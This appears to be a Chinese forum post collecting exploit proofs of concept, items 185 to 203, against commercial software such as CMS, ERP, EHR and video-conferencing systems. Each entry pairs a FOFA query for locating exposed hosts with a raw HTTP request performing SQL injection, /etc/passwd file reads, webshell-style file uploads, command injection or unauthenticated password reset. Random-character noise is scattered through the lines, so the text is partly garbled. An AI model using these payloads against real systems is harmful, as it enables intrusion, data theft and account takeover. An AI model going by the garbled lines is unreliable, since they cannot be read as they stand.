insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56'). K; }2 Y* f0 V& J1 P6 p+ e
4 {% W6 `9 }% B' \! I0 v5 }9 H- B
; g! O7 x; [& r: ?- _& N9 P
185. 瑞友天翼应用虚拟化系统SQL注入
% X) }; a2 l' l3 uversion < 7.0.5.10 p$ y) e, K: B0 p* y _
FOFA:app="REALOR-天翼应用虚拟化系统"
7 d* R7 T- h4 }GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
1 g$ w2 B. N$ X% m' \Host: host* g* w! L* C8 }7 ?
6 j$ K4 J+ H$ R3 S
! f. T, ?0 L7 _
186. F-logic DataCube3 SQL注入
& i7 z2 n/ \5 Z3 s8 ^CVE-2024-317508 r( b/ [$ j. d: U9 Q: [+ g
F-logic DataCube3是一款用于光伏发电系统的紧凑型终端测量系统
3 S, W1 W- N1 x5 I# fFOFA:title=="DataCube3"2 R7 a8 Z7 R* Q) @3 u) U
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
$ m. a' Z" ?* hHost: your-ip) o r+ Y7 D% z$ L0 y& L
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0- b# M' u/ H! t
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
/ \9 {& B! V( R8 J: i- _Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
9 H3 p0 T5 Q4 f, e- Q' x# A. tAccept-Encoding: gzip, deflate+ Q% @" E3 m- o4 `9 G- ~! Y( G
Connection: close! Q; m3 ~7 v% D$ c. m" i/ _
Content-Type: application/x-www-form-urlencoded
. c' C+ T' x3 m( P+ M* C7 u: w
% s- j; j7 z5 Yreq_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450
3 i8 ~& n3 [) F8 f1 [ Z; @0 i
8 M% I4 W8 M1 @6 u( j' |; H( q
' i5 z8 ]+ ~; \0 V/ @( U187. Mura CMS processAsyncObject SQL注入! S2 o' c3 K$ b j2 P- g# y
CVE-2024-326408 q' Z. l' V4 c2 R6 l1 ]
FOFA:"Mura CMS"
& C4 H. B% W7 k3 b8 V, lPOST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.11 ]$ {6 O- I4 \2 a
Host: your-ip; _* X/ K6 `# B b7 N# O$ V) N
Content-Type: application/x-www-form-urlencoded2 v5 ?( I3 b' T- O. E3 R/ \) ^
B0 ]0 ?: s" R& @) ?+ t* G8 C! W- o9 R! Z1 R$ u7 G
object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1" H5 Q+ a Q* e1 h8 B
8 v0 ^' j7 D2 @, R) k0 u# N
1 A: u! I3 x6 |188. 叁体-佳会视频会议 attachment 任意文件读取1 c1 `7 r, o: {$ a
version <= 3.9.7, H1 u3 g/ S6 Z$ X$ Z- m! w! G
FOFA:body="/system/get_rtc_user_defined_info?site_id"- g @9 e% O6 L r H% {
GET /attachment?file=/etc/passwd HTTP/1.1
- O- G; B- Y/ U @) pHost: your-ip) Z: s/ w8 x/ J: b9 ~
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36% K7 a$ R5 |$ [ F/ N
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
6 b+ {8 `) ^, mAccept-Encoding: gzip, deflate
* H& a3 U0 |' U; B! wAccept-Language: zh-CN,zh;q=0.9,en;q=0.8
3 n" z) ]- W* @3 J. N, u0 QConnection: close
; T" N( t4 c Q1 `7 D, R4 ^5 Q+ r4 N. i7 ^) b6 m
9 ?! o( ^7 i7 R/ w189. 蓝网科技临床浏览系统 deleteStudy SQL注入
7 B) v( V: X# t% K& e* RFOFA:app="LANWON-临床浏览系统"
+ w1 ]2 |9 ?, g f+ gGET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.16 P1 K G& J8 A
Host: your-ip7 [+ [: ? {+ o2 X
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.365 Y& u) k5 v2 z7 Q# ]; t, e
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
" l+ E- E7 j* S' SAccept-Encoding: gzip, deflate
: H% o# N/ B1 X6 QAccept-Language: zh-CN,zh;q=0.9
/ q7 O0 S& { wConnection: close
9 T- F. }5 L. [# N, Q9 h( C* X: Q* w8 Z/ F, ?
4 Q5 r) @. f9 h! L190. 短视频矩阵营销系统 poihuoqu 任意文件读取: |+ N* B) H% y( Q( e$ f
FOFA:title=="短视频矩阵营销系统"
* n: A4 i6 X) M& v+ t$ ?, Y! EPOST /index.php/admin/Userinfo/poihuoqu HTTP/2
& q" r v6 E4 y* t9 i0 MHost: your-ip9 @% O- w1 S* b" u4 g3 Z7 l4 R5 W
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36" q7 n% f3 w4 [/ _& _
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
5 F0 K \2 ? }; M; `+ _Content-Type: application/x-www-form-urlencoded- w8 D0 n1 l) H' ]: _ W( c7 K) F
Accept-Encoding: gzip, deflate
" H3 S) [0 n* Z* g3 p& uAccept-Language: zh-CN,zh;q=0.9% c' E+ @4 P/ ]0 l* `( G6 B
8 C% L9 C _1 t# E. tpoi=file:///etc/passwd, o2 [3 h* i& g) B+ |: I8 d
6 z# P$ ?9 N' r! P. E- |' o: m, K
# O2 I3 f9 P& P2 g# Z191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入
( B# E9 Z4 e; }& Y( R% y' P. [FOFA:body="/CDGServer3/index.jsp"4 c* k! l$ b! B/ a" v
POST /CDGServer3/js/../NavigationAjax HTTP/1.10 {, o- h2 O/ Z5 B9 O& H% ^+ `6 r
Host: your-ip8 y6 `! J. c" y4 Q4 R7 P
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
2 X5 ?& n% F7 X% S+ C) o7 z/ ^Content-Type: application/x-www-form-urlencoded' t+ x, b' I* \
2 `5 S9 Y4 n" Y7 b5 w# k5 Ecommand=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=
D5 e0 H0 l" `/ i* N8 o2 E( H8 d9 X$ }2 V T, O/ Y8 ?+ S0 }9 G/ \
) L, a( L3 P5 j! k
192. 富通天下外贸ERP UploadEmailAttr 任意文件上传
" j: X9 `1 z) f% _! BFOFA:title="用户登录_富通天下外贸ERP"
, h: S. B$ B" ^$ x/ @" z# U- [$ @" tPOST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1% X- s9 ^4 @. a& z" ? F/ p8 x
Host: your-ip+ u8 B& Q# q0 i; I3 O( m
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
8 y+ @ G2 A( W" v5 _: A; ]Content-Type: application/x-www-form-urlencoded
; R3 \$ Z0 r- X! r
+ G! O4 s4 F+ v# o. h% {$ E% ~) g) L* J5 v
<% @ webhandler language="C#" class="AverageHandler" %>
8 K/ F V1 H: S( i, l3 p8 Zusing System;
# L6 X" I* {+ m: W5 F9 Jusing System.Web;
; r5 e0 `* U! }7 o. J$ zpublic class AverageHandler : IHttpHandler! m+ ^0 A7 w: I& ]3 K) v
{$ i% B% ^. D4 b; e
public bool IsReusable
( U6 r8 l- G" S; {{ get { return true; } }& e9 k: `8 q! U y1 U8 ~, _( y
public void ProcessRequest(HttpContext ctx)% Q9 A) j5 e0 A2 e8 ]1 c8 Z& v
{
" C% [8 N1 A2 e! f1 y9 g$ Bctx.Response.Write("test");
7 N& h# |0 B5 L9 I% x- |3 y9 P}
+ E# m7 P* R3 K$ H) R: O, m$ h, C! T/ ~}2 c& H7 T# r$ k6 o7 F
3 }- i T$ K& v( R) S1 X8 O, @- ]1 `7 G, x+ N# k/ W
193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行
/ M7 f4 T2 C% z; XFOFA:body="山石云鉴主机安全管理系统"
: P, C* [/ c) v% C! ^0 vGET /master/ajaxActions/getTokenAction.php HTTP/1.1
3 G6 G. T1 B$ j3 h m" r( y+ _Host:+ \$ R- r, y6 a" {- r2 ?$ x3 g
Cookie: PHPSESSID=2333333333333;) x. V4 S" }7 D' ^% G
Content-Type: application/x-www-form-urlencoded
7 w& y0 D# @& ?$ i4 G5 }User-Agent: Mozilla/5.0
6 T' X. |8 a* s% F4 t/ i, E9 a: ]# I8 c i7 a$ h
' w0 H6 C. r7 x3 |4 p* UPOST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1. a% U. B: b. m# U, K/ A4 u$ _( k
Host:
# ]2 {1 o. t2 V' g+ A: ?9 T' uUser-Agent: Mozilla/5.0
- z8 H% o1 H& h/ o8 {3 f5 OAccept-Encoding: gzip, deflate
2 K6 {: r2 F3 `; g5 \$ R- AAccept: */*
8 }" _; |/ f; Z2 X QConnection: close
& v# @6 `3 z- ~& K) F- BCookie: PHPSESSID=2333333333333;
& V a) b9 K: NContent-Type: application/x-www-form-urlencoded
/ }* J1 D5 L: KContent-Length: 84
B6 s; l# M0 R, Z$ x! f
+ ?3 u1 m" \0 D% ?$ Gparam=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')
4 X7 F$ \$ t1 ~; l3 D6 }8 p: k2 U4 N0 f6 F" G6 S
, M" R# M- h! }3 d% \3 m+ |GET /master/img/config HTTP/1.1
8 f3 r6 ]( _3 _) ^Host:/ x) a6 i o# P1 L
User-Agent: Mozilla/5.0
5 X8 F3 ^: z) I r, e/ w& M* g' ~, L
- _3 i7 q% E( e3 f0 J( n
194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传' ?( }" X. q5 C0 H& @3 \+ D( \
FOFA:app="FE-协作平台"访问 /servlet/uploadAttachmentServlet 有返回则漏洞存在
# T1 E3 m ]4 I) x: G A$ N5 n
" {% `! c/ y3 [6 r& V6 rPOST /servlet/uploadAttachmentServlet HTTP/1.1- b+ t9 Q9 }+ w7 F! h
Host: host6 [, _% t3 x% ?& s. p# \. F% z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
4 A& u4 ]' e& MAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8( M" [1 M0 w/ o1 ~) L
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
\2 E# c6 e0 {. S" n4 K) oAccept-Encoding: gzip, deflate
6 S/ U, }- I! x0 ?2 G* mConnection: close
4 J0 `* _9 m- L* l- o1 cContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk
! K6 g8 o% P1 E$ g+ A------WebKitFormBoundaryKNt0t4vBe8cX9rZk
4 g5 j- p' O8 \
: D, A5 l" C: Z" \3 ?. TContent-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
( C) @) r2 G Z3 RContent-Type: text/plain8 O9 [8 |% Q/ x. D/ d: ~+ g
<% out.println("hello");%>
, t$ _, ^* ^7 v; W8 s------WebKitFormBoundaryKNt0t4vBe8cX9rZk
1 W. v; v, _* p8 ]! U3 ]Content-Disposition: form-data; name="json"/ Z' W, c+ C, u& V* M' M! ]5 i4 V
{"iq":{"query":{"UpdateType":"mail"}}}# \# ?. J* ^6 F2 C' S g9 p2 `, ]% u
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--+ g7 r) m2 k/ U& C q* Y8 O
$ C+ W) a/ ?: B% f; ?
! _ e; v, J) Z195. 飞鱼星上网行为管理系统 send_order.cgi命令执行
. {5 z# `, T% ^0 T KFOFA:title=="飞鱼星企业级智能上网行为管理系统- y- M9 l4 S/ A1 t; @
POST /send_order.cgi?parameter=operation HTTP/1.11 v- x5 t3 ?# G& A
Host: 127.0.0.1
C4 _5 R, }4 qPragma: no-cache. B- q8 e) H {! J6 |" b5 V
Cache-Control: no-cache
) h2 c" R. `& e( yUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
- C) I+ u7 v/ J/ G6 K$ mAccept: */*
6 f9 ]6 t/ L5 g/ h" i0 iAccept-Encoding: gzip, deflate! b/ ]+ s# [; K+ k
Accept-Language: zh-CN,zh;q=0.93 @3 _( j3 L: z3 i6 F8 n
Connection: close
3 \5 O% b4 K! I2 @" |, HContent-Type: application/x-www-form-urlencoded! S! t2 p+ R4 I5 a' X
Content-Length: 683 V9 m, H1 T- c3 p* s; M
, c/ ~( L: u# K
{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}
3 g& P, k4 S& r1 m; E7 l6 c; r# l" h* b& d' Q
o" c( ?0 |& M7 a. B
196. 河南省风速科技统一认证平台密码重置
+ z! p8 ]( J7 ]$ uFOFA:body="/cas/themes/zbvc/js/jquery.min.js"
8 Q1 f$ g6 F* @" E( nPOST /cas/userCtl/resetPasswordBySuper HTTP/1.1
+ N6 T5 b4 N" h5 m4 RUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.363 O4 e' G+ v2 V
Content-Type: application/json;charset=UTF-8- T3 M4 b4 g6 K* s
X-Requested-With: XMLHttpRequest% a: I* |% f A
Host:/ u; H7 X E6 [$ d9 y, H
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2$ h2 y& J# L7 @' K: w* U: y- p1 B! [
Content-Length: 45+ B. l* @! M9 i4 P& ^
Connection: close
" j5 i! ]% [1 V6 t. v& _ i& u
3 c1 P/ X- {# g. e{"xgh":"test","newPass":"test666","email":""}
3 L4 X. O f8 J* S+ e: [6 j% Q( R9 u, k5 v7 B) r; Y8 x7 ~% L
9 \$ q+ A+ S7 l
& B. o9 L/ k q, V3 T; `* o
197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入: W+ E0 Q) F- \$ C
FOFA:app="浙大恩特客户资源管理系统"+ D4 r* G+ y L1 u4 X
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1) w7 U* W5 M& z% ~$ m
Host:3 h9 F0 n' D4 H1 {
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
! e' A$ N: ]& _' u4 f3 BAccept-Encoding: gzip, deflate
8 M# ~+ p7 f. ], D1 E, O9 Y+ X) U& E! CConnection: close
( L5 |% |3 f' z* O1 `& D7 x5 \( t& ]0 X* D; ?7 d+ I0 G* e
k! c) ?/ e" v3 Q; p" s$ X3 L4 R' _- z
198. 阿里云盘 WebDAV 命令注入4 E" |" k2 r$ x( q) q: Z
CVE-2024-29640
. |# F! W( i/ CGET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.16 `$ q" u0 }$ Z
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
) D0 }9 \3 e+ n( m! O' ^Accept: */*
8 K9 K9 ?4 m+ u. G+ ]Accept-Encoding: gzip, deflate
3 G/ x8 o% s& Z$ J4 n% D1 pAccept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
5 q4 M( m( n, U A2 r* d) H. GConnection: close
: \( L$ F1 |) {, y1 w5 d
! B: ~* o5 ?7 v$ N- d: S
5 Q* z2 W0 G( k! I6 ^: c! o4 W7 |199. cockpit系统assetsmanager_upload接口 文件上传" Y- b4 l b: e9 z' h; V+ n
; B- m' L# D: U8 N5 m1 m
1.执行poc进行csrf信息获取,并获取cookie,再上传访问得到结果:
$ I6 M% L& G5 {9 X0 QGET /auth/login?to=/ HTTP/1.1) p) S2 A+ }7 x! i8 t
N, k7 ]/ T1 U5 N响应:200,返回值:csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"
/ d& J2 B6 `" l5 G4 U7 ~5 n; A [0 c- R* Q& M
2.使用刚才上一步获取到的jwt获取cookie:
9 p# Y$ ~" j9 w0 X' C* G& \; I) N) I" J
POST /auth/check HTTP/1.1, T/ n' X5 \1 e; U- b8 y: [
Content-Type: application/json
T; b- O& o; v1 W! f7 I0 Z% V- h. Z8 P: S1 n% A
{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}% [) ^/ E1 R" Q0 ~
; k0 y: r$ L( X X/ x4 `: U
响应:200,返回值:
, d* }/ }5 z4 ], h7 o( ISet-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/9 p2 u8 r( Y0 t' i9 I
Fofa:title="Authenticate Please!"
4 e- [2 r B/ I2 l- t9 DPOST /assetsmanager/upload HTTP/1.1
, T+ L# ^$ I: N& Z; dContent-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb34 \3 V" Z% H' m1 X
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92
' T6 S1 L/ o% `% F+ g* z9 S. l9 N4 N- u' R5 M, a
-----------------------------36D28FBc36bd6feE7Fb3
$ j' X" z* U F0 Q( D. o: |Content-Disposition: form-data; name="files[]"; filename="tttt.php"9 ~3 L$ g" A8 l/ k4 J
Content-Type: text/php" L/ }$ C, J0 q* l; ]$ K! E) m
# N- s8 R% p; w8 ^<?php echo "tttt";unlink(__FILE__);?>; r1 B2 {/ c B* g
-----------------------------36D28FBc36bd6feE7Fb3! I6 X4 \2 U( o
Content-Disposition: form-data; name="folder"
/ o- @1 u/ ?, v1 \% b" t6 u. X8 N
" I/ n1 n1 ^' P' N9 D- y9 s-----------------------------36D28FBc36bd6feE7Fb3--; h! n s6 x3 p- Q6 `5 Q
2 Q( Y7 S- | q+ G
( H+ s) m2 N: X- m- X- h6 [/storage/uploads/tttt.php
5 |8 F* ^ [; v, I+ t
, J8 t1 _+ c$ B) t; l9 u; e2 L200. SeaCMS海洋影视管理系统dmku SQL注入
; b6 ]1 [2 |" O& m/ gFOFA:app="海洋CMS"8 |1 }% H7 z# ~. U0 R/ w$ D, ]
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
: g5 ^4 k* g) }$ \3 lCookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s1 G8 j( [1 T Y; D- I& s
Upgrade-Insecure-Requests: 1
! v6 S" K) m6 q) v' hCache-Control: max-age=0
( ]/ K0 t" {& b! sAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
; j: i) u: B7 o" f u- _Accept-Encoding: gzip, deflate
2 @7 G% A) ]8 }( pAccept-Language: zh-CN,zh;q=0.9
6 l: a \ C L( {3 q" z% w- e5 R- { n+ I/ J+ i- Y
3 Y7 Y" s/ B" d201. 方正全媒体新闻采编系统 binary SQL注入) @: B6 D4 N( J+ O" Z& w8 o1 L
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"" p, V3 k! f8 L! M& K
POST /newsedit/newsplan/task/binary.do HTTP/1.1: o! d4 p, L& u7 z
Content-Type: application/x-www-form-urlencoded" v! }' M- M! v: _6 X
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7: w* H/ m2 h+ V7 R4 b
Accept-Encoding: gzip, deflate
: [. F, P) l* Z1 P, tAccept-Language: zh-CN,zh;q=0.9" r; r0 a# \+ `) o% }6 A
Connection: close
" n1 N0 l& |- B0 N* ?2 m ~( {# B& g3 [3 C4 n
TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1
1 |' Y k% C/ h: U
! C# r# Y+ p+ L/ S9 ~3 s4 ]
! M W" }: i& T" I; }) `202. 微擎系统 AccountEdit任意文件上传2 C/ o- f- Z7 a; I9 Q4 @7 }
FOFA:body="/Widgets/WidgetCollection/", }+ [( r9 }4 u8 q1 T* i e
获取__VIEWSTATE和__EVENTVALIDATION值
5 O. m% B6 [. y, @1 ]4 gGET /User/AccountEdit.aspx HTTP/1.13 s$ {) h+ H9 ~! `5 P7 e: k
Host: 滑板人之家
' `4 k* |6 t& g L5 g3 @) O% n" y" F9 QUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
2 T+ f# x0 {1 q0 R* r4 q5 tContent-Length: 0
5 O- W8 o p: E1 K9 c" p. f4 E7 L, H; {; R% z$ a/ n2 Y. H# i
0 K8 H% n9 C4 ?2 E* V; g- d
替换__VIEWSTATE和__EVENTVALIDATION值# k; Q/ C$ E- Z* o; ?
POST /User/AccountEdit.aspx HTTP/1.17 ~: }( i; }+ j$ e. O
Accept-Encoding: gzip, deflate, br' O6 L6 `2 M' B. [6 K# S
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687! Q. H& O2 `/ @, C% }3 x
8 X) M4 @ y+ J' g
-----------------------------786435874t385875938657365873465673587356878 |! P& ?. _% q- }( w% z( W1 M
Content-Disposition: form-data; name="__VIEWSTATE"
0 q: v; e. c8 j1 ^+ s8 z# t6 l+ C# r8 {3 G) @3 V2 G
__VIEWSTATE9 I. P3 S5 J. ]' H
-----------------------------786435874t38587593865736587346567358735687
0 `/ T8 _ x% W, L3 ]& [Content-Disposition: form-data; name="__EVENTVALIDATION"
X% Y2 i7 o0 W/ D: B% \+ V" x2 ^1 e( G" E: d/ i3 L+ D z
__EVENTVALIDATION1 m+ t' v- `# Y
-----------------------------786435874t38587593865736587346567358735687 \3 [' H* ?( e/ b# X+ W
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
4 F7 ?3 k' R# T7 J/ p0 RContent-Type: text/plain* c* t0 r) ]! W: Q
! x5 E- j5 q0 Y9 H; m9 m0 P
Hello World!$ \7 p! R) Q) A* Y7 {2 J- L t
-----------------------------786435874t38587593865736587346567358735687
: R$ l2 J7 {0 A3 r% vContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"
. w& l5 [* q1 i. _) k) C5 i
8 q. L& ]- d+ ~上传图片2 E l2 ~; Z: q. @" s+ O r! C8 Q2 q
-----------------------------786435874t38587593865736587346567358735687" P" B& C4 Z/ d% J
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"% h* H+ _, b1 F1 A
7 ]) A* m1 F! j. C9 [. M& @) h5 z! _5 {" P0 f4 @
-----------------------------786435874t38587593865736587346567358735687
3 _0 W4 N) M( {- F; tContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"; t/ j! l4 b( Y& Y
2 o* |1 v' d; \7 N- G J. v9 |7 I- U3 n2 [
-----------------------------786435874t38587593865736587346567358735687--
5 o/ I |8 C# B
: o" G, q/ R' A+ C s5 ^% s! S3 w' [4 ]
/_data/Uploads/1123.txt
' H8 D9 \" D& n5 w
! H% }( q+ Y) i203. 红海云EHR PtFjk 文件上传
# i' }1 k1 r. B. l. u# mFOFA:body="RedseaPlatform"* ^/ U1 Q( P3 @* @/ a) q5 @
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
& Z) R. T/ E! Z4 RHost: x.x.x.x+ L% D6 G$ l9 u, B; O
Accept-Encoding: gzip4 i$ @) \; k7 R# V
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.159 j I7 x4 B% e3 L, d1 F; b5 k
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
$ T: M, D8 H0 ~: ZContent-Length: 210
5 r. D, l: A7 K7 m5 K5 \, T- A2 C* Z
------WebKitFormBoundaryt7WbDl1tXogoZys4
3 g, ^3 T8 w8 D# @( ~) |/ X2 IContent-Disposition: form-data; name="fj_file"; filename="11.jsp"
+ {' @4 {9 S/ {4 i. ^6 S. ?! S' vContent-Type:image/jpeg
% b0 I- W' K! _; D; O- ^
4 W$ w! U0 ^+ a- e0 w8 H$ D) j<% out.print("hello,eHR");%>
- L$ V$ e" Q! D) a2 y! B------WebKitFormBoundaryt7WbDl1tXogoZys4--
. r7 V6 j% k6 `/ D; V- x2 R, f1 B$ ~0 J' L$ F, t O5 r
. q' m3 N9 k- U+ B" f3 ~6 v
4 S+ ]" |: \3 C* T. p( p: q" K% I$ Z
8 F1 h5 r. H' B2 U* M( k/ h7 a- _8 K$ ?
, U' }! X0 [. x- g% S2 M5 F |
发表于 2024-6-5 14:31:29
收藏
支持
反对